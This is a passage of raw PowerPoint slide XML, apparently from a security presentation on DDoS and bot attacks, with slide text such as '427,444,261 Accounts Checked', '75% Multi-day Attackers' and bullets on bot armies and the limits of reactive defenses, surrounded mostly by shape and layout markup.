            <a:ext cx="8591565" cy="5233746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6801341"/>
            <a:ext cx="10545592" cy="547842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="146304" tIns="73152" rIns="146304" bIns="73152" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>427,444,261 Accounts Checked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Frame 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1005841" y="2886579"/>
            <a:ext cx="8591563" cy="3094330"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 221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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" b="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9825779" y="3959768"/>
            <a:ext cx="4073102" cy="947952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="146304" tIns="73152" rIns="146304" bIns="73152" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>75% Multi-day Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14697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Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The burst speed of attacks has become too fast for reactive defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small bot armies can generate large DDOS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huge bot armies have been employed in application-layer attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16561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cloud copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3963017" y="2154747"/>
            <a:ext cx="7399010" cy="4970146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8468653" y="5747163"/>
            <a:ext cx="417970" cy="1271501"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4912"/>
              <a:gd name="connsiteY0" fmla="*/ 8633 h 8633"/>
              <a:gd name="connsiteX1" fmla="*/ 4912 w 4912"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 8633"/>
              <a:gd name="connsiteX0" fmla="*/ 9944 w 19944"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 3580 w 19944"/>
              <a:gd name="connsiteY1" fmla="*/ 3493 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 19944 w 19944"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 98986 w 98986"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 92622 w 98986"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 3333 w 98986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 95653"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 89289 w 95653"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 95653"/>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1154"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 101154 w 101154"/>
              <a:gd name="connsiteY1" fmla="*/ 11472 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 101154"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95088 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 23678 h 23678"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 23678"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23678"/>
              <a:gd name="connsiteX0" fmla="*/ 93393 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 22063 h 22063"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 22063"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22063"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 21493"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 102284"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 102284 w 102284"/>
              <a:gd name="connsiteY1" fmla="*/ 10047 h 21493"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102284"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 96916 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 22206 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 1 w 8610"/>
              <a:gd name="connsiteY0" fmla="*/ 11446 h 11446"/>
              <a:gd name="connsiteX1" fmla="*/ 2960 w 8610"/>
              <a:gd name="connsiteY1" fmla="*/ 11304 h 11446"/>
              <a:gd name="connsiteX2" fmla="*/ 8610 w 8610"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 11446"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8610" h="11446">
                <a:moveTo>
                  <a:pt x="1" y="11446"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-49" y="11367"/>
                  <a:pt x="3010" y="11383"/>
                  <a:pt x="2960" y="11304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="861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0" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8941859" y="5719763"/>
            <a:ext cx="2153322" cy="1028700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 14539 w 14539"/>
              <a:gd name="connsiteY0" fmla="*/ 12226 h 12226"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14539"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 12226"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 38813"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38821"/>
              <a:gd name="connsiteX1" fmla="*/ 47753 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 34104 h 38821"/>
              <a:gd name="connsiteX2" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 20446 h 38821"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 38821"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 14254 w 14254"/>
              <a:gd name="connsiteY0" fmla="*/ 13658 h 13658"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14254"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 13658"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14254" h="13658">
                <a:moveTo>
                  <a:pt x="14254" y="13658"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="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1" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4905022" y="1950722"/>
            <a:ext cx="1201536" cy="730184"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 16998 w 16998"/>
              <a:gd name="connsiteY0" fmla="*/ 5740 h 5740"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 16998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5740"/>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 7886 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 17081"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 16395 w 17081"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 17081"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 18986"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 18300 w 18986"/>
              <a:gd name="connsiteY1" fmla="*/ 10713 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 18986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 9791 w 9837"/>
              <a:gd name="connsiteY0" fmla="*/ 10713 h 10775"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 9837"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10775"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9837" h="10775">
                <a:moveTo>
                  <a:pt x="9791" y="10713"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10477" y="11573"/>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6" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8263736" y="1261983"/>
            <a:ext cx="567302" cy="1153052"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 14181"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 12023 w 14181"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 14181"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 93452"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 91294 w 93452"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 93452"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 91348"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 89190 w 91348"/>
              <a:gd name="connsiteY1" fmla="*/ 9368 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 91348"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 9919 w 10257"/>
              <a:gd name="connsiteY0" fmla="*/ 9368 h 9697"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 10257"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9697"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10257" h="9697">
                <a:moveTo>
                  <a:pt x="9919" y="9368"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12077" y="11421"/>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7" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8837921" y="2131097"/>
            <a:ext cx="1939990" cy="480060"/>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273" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3859980" y="2541736"/>
            <a:ext cx="7040949" cy="1646408"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="770"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2359" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2359" h="770">
                <a:moveTo>
                  <a:pt x="0" y="770"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2359" y="0"/>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36220" name="Group 36219"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3289189" y="703069"/>
            <a:ext cx="8435956" cy="6981053"/>
            <a:chOff x="3289189" y="703069"/>
            <a:chExt cx="8435956" cy="6981053"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3289189" y="6544628"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="3" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3634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4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5" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3634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3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7" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8170492" y="7101192"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="28" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3626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6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9" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3626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5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54" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4169976" y="1286301"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36166" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3618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9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9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67" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3618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8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8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93" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7997957" y="703069"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36205" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3616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6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06" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3616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6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5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83" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="11181339" y="6550761"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="284" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35981"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82"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83"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85" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35978"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79"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0"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73"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4"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5"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6"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7"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pic>
        <p:nvPicPr>
          <p:cNvPr id="35920" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10877925" y="1882563"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
